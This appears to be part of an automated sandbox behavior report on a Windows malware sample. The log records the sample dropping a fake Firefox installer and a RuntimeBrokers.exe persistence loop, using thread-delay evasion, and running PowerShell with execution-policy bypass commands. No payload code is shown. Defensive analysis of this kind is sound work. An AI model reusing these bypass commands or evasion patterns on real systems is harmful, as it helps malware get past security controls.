Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeWindow / User API: threadDelayed 8105Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9806Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9846Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\backup.dllJump to dropped file
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeDropped PE file which has not been started: C:\Users\Public\Bilite\Firefox Setup 132.0.2.exeJump to dropped file
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 8260Thread sleep time: -73000s >= -30000sJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 8256Thread sleep count: 105 > 30Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 8256Thread sleep time: -315000s >= -30000sJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 8256Thread sleep count: 8105 > 30Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 8256Thread sleep time: -24315000s >= -30000sJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 8864Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 1808Thread sleep count: 41 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9136Thread sleep count: 9806 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9196Thread sleep count: 9846 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4608Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 3292Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8144Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6148Thread sleep count: 269 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 4292Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 5432Thread sleep count: 269 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 5840Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 5476Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 4560Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7612Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 1564Thread sleep count: 269 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 3384Thread sleep count: 269 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 32Thread sleep count: 268 > 30
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeThread delayed: delay time: 73000Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,0_2_00406D5D
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_0040D72E cpuid 0_2_0040D72E
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00401F9D
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
